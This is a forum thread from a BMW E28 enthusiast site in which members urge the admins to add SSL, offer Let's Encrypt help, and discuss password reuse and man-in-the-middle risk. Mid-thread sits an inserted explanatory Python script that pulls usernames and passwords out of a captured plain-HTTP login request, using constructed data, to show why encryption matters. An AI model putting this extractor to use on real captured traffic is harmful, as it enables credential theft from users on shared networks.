Encryption
I can't believe I've never noticed, but I did today and am concerned that mye28 isn't encrypted with an SSL certificate. Not trying to call anyone out, web security is hard, but considering how many sites are getting popped these days... I'm surprised it hasn't already been an issue. Is there any way I can help?
Re: Encryption
+1.
Re: Encryption
Was discussed before: http://www.mye28.com/viewtopic.php?f=8&t=125208
There I wrote:
cek wrote:
Wow, I just noticed that the sign-in page does not use SSL.
Justin_FL wrote:
I can patch the server soon but from a quick reading it affects encrypted SSL data, which is not used by this forum.
This means that every user's password is SENT IN CLEAR TEXT when they enter it. This means that you should NEVER log in to mye28.com from wireless network that you are not 100% sure is secure (like a coffee shop) because it is likely that someone is sniffing the data and will see your password.
If you use that same password on other sites then all the hacker needs to know is your email address.
People using this forum should use extra care to use a UNIQUE password for this site from all other passwords they use.
Since the Heartbleed vulnerability gives attackers access to memory on the server it does not matter if SSL is actually in use or not. The test I pointed to above shows that the site is exploitable.
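To make the "SENT IN CLEAR TEXT" point concrete, here is an added example (not code from the original thread or from the forum software) of the parsing step a passive eavesdropper on the same wireless network would run over a captured plain-HTTP login. The captured request, the host name, the form field names and the credentials are all constructed for this example; the actual packet capture (tcpdump, a mirror port, a hostile access point) is assumed and not shown. The second input is a constructed TLS application-data record of the same shape a sniffer would see if the site used HTTPS: nothing parseable comes out of it.

```python
"""Added example: what a passive sniffer recovers from a plain-HTTP login.

The request bytes below are constructed for illustration. The host
(forum.example.invalid), path, field names and values are not taken
from any real site or capture.
"""
from typing import Optional
from urllib.parse import parse_qs

# Constructed: the login form body as a browser would encode it.
_BODY = b"username=alice&password=correct+horse+battery&login=Login"

# Constructed: the full POST as it appears on the wire over plain HTTP.
CAPTURED_LOGIN_REQUEST = (
    b"POST /ucp.php?mode=login HTTP/1.1\r\n"
    b"Host: forum.example.invalid\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode("ascii") + b"\r\n"
    b"\r\n" + _BODY
)

# Constructed: a TLS 1.2-style application-data record (type 0x17,
# version 0x0303, length 64) followed by 64 opaque ciphertext bytes.
# This is what the same login looks like to a sniffer once the site
# serves HTTPS: the form fields are not recoverable from it.
TLS_ENCRYPTED_SEGMENT = b"\x17\x03\x03\x00\x40" + bytes(64)


def parse_http_request(raw: bytes):
    """Split one raw HTTP/1.x request into (method, target, headers, body).

    Returns None when the bytes are not a well-formed request, which is
    exactly what happens for a TLS record.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    try:
        length = int(headers.get("content-length", "0"))
    except ValueError:
        return None
    return method, target, headers, body[:length]


def extract_credentials(
    raw: bytes,
    user_fields=("username", "user", "email"),
    pass_fields=("password", "passwd", "pass"),
) -> Optional[dict]:
    """Pull a username/password pair out of a captured form login, if any.

    The field-name lists are guesses an attacker would tune per target;
    they are assumptions for this example, not a property of any site.
    """
    parsed = parse_http_request(raw)
    if parsed is None:
        return None
    method, target, headers, body = parsed
    ctype = headers.get("content-type", "")
    if method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return None
    fields = parse_qs(body.decode("iso-8859-1"))
    user = next((fields[f][0] for f in user_fields if f in fields), None)
    password = next((fields[f][0] for f in pass_fields if f in fields), None)
    if user is None or password is None:
        return None
    return {
        "host": headers.get("host"),
        "path": target,
        "username": user,
        "password": password,
    }


if __name__ == "__main__":
    # Plain HTTP: the credentials fall straight out of the capture.
    print("http :", extract_credentials(CAPTURED_LOGIN_REQUEST))
    # HTTPS: the same login is an opaque record; nothing to extract.
    print("https:", extract_credentials(TLS_ENCRYPTED_SEGMENT))
```

Note that `parse_qs` decodes the `+` in the body back to spaces, so the recovered password is the literal string the user typed; this is also why the "use a unique password for this site" advice above is the only protection a user has until the site itself moves to HTTPS.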
Re: Encryption
OK then. My offer for help is there if anyone wants it.
Re: Encryption
https://www.engadget.com/2018/02/08/goo ... ure-label/
Upcoming Chrome update will label HTTP sites ‘not secure’
I, too, am willing to help however I can.
Re: Encryption
If it's a cost issue, https://letsencrypt.org is a fantastic [FREE] option. I do this stuff for a living, so really, I don't mind lending a hand. Mye28 has been an invaluable resource to me for over 10 years now...I'm honestly not sure I could've survived my 528e this long without this forum
If it is about money and/or time, I'm willing to foot those costs for the sake of this community. Sorry if I'm being pushy, it'd just be sad to see this forum suffer because some jacka** came along and saw everything was unencrypted.
Re: Encryption
I'll look into this.
Re: Encryption
Bump. I second what duggi said - letsencrypt is free, easy, and I can help. And I'm off this week...
Re: Encryption
Bump - any updates?
Posts: 836
Joined: Apr 26, 2007 7:03 PM
Location: Milwaukee, WI
Re: Encryption
Any updates? I have been periodically getting notifications from my credit monitoring software that some very old forum account logins from other sites are being found on the dark web. There should really be some form of encryption on this site.
Re: Encryption
+1. There's several offers for help here, and if the platform supports it, letsencrypt is free.
If it doesn't support it, I'm sure we'd chip in for a "real" cert.
Re: Encryption
Happy to contribute too. An SSL cert should be peanuts for us to collectively pay for and figure out what TLS software is being used. I was a web and computer guy for 17 years professionally before I gave it up for a dirty wrench.
Re: Encryption
Will this ever be addressed?
Re: Encryption
I’ll throw my hat in the ring for help. We do SSLs on all of the sites we develop, it’s super important in the current state of the web.
Re: Encryption
I spent a few hours getting a proof of concept working...it's not hard: https://forum.duggi.net
Re: Encryption
I do agree, the longer this site is completely unencrypted, the more vulnerable we all become. I'm sure there are many members who unknowingly use the same passwords for mye28 as they do for more "sensitive" sites. What do you need, Beamters? Benefactors of this site range from blue collar to millionaires to tech-giant executives. The internet is no longer a place where you can stand up a site and leave it for a decade. Let us know what is needed to secure it and I'm sure we can overcome any obstacles.
Re: Encryption
I think it is probably time to update the site to a current hosting package, the one we are on is old and the backend management software is older (still supported) but lacking features like free SSL stores that are common now vs years ago. So I don't see getting the certificate in place until then, otherwise you have to do a bit of script and config file hacking to make them work which breaks Plesk. The current release has the ability to manage them just fine.
Maybe once this hurricane is away I'll talk with Jeremy about initiating the process.
And correct me if I'm wrong, but the risk here is a man in the middle attack, i.e. someone sniffing your Internet packets and getting the login info or your PMs.
Re: Encryption
Justin_FL wrote:
I think it is probably time to update the site to a current hosting package, the one we are on is old and the backend management software is older (still supported) but lacking features like free SSL stores that are common now vs years ago. So I don't see getting the certificate in place until then, otherwise you have to do a bit of script and config file hacking to make them work which breaks Plesk. The current release has the ability to manage them just fine.
Maybe once this hurricane is away I'll talk with Jeremy about initiating the process.
And correct me if I'm wrong, but the risk here is a man in the middle attack, i.e. someone sniffing your Internet packets and getting the login info or your PMs.
Thanks for the thoughtful reply, totally fair. Please feel free to reach out if you need extra technical hands or a little $$ to make it easier.
And yes, the risk is down to a man-in-the-middle stealing user credentials. It's the common practice of reusing credentials across multiple sites that puts the users here at risk, but the site itself has nothing important to "encrypt" or "hide" from the public. It would be sad though if mye28 was opportunistically hacked and taken-down by some rando "just because they could."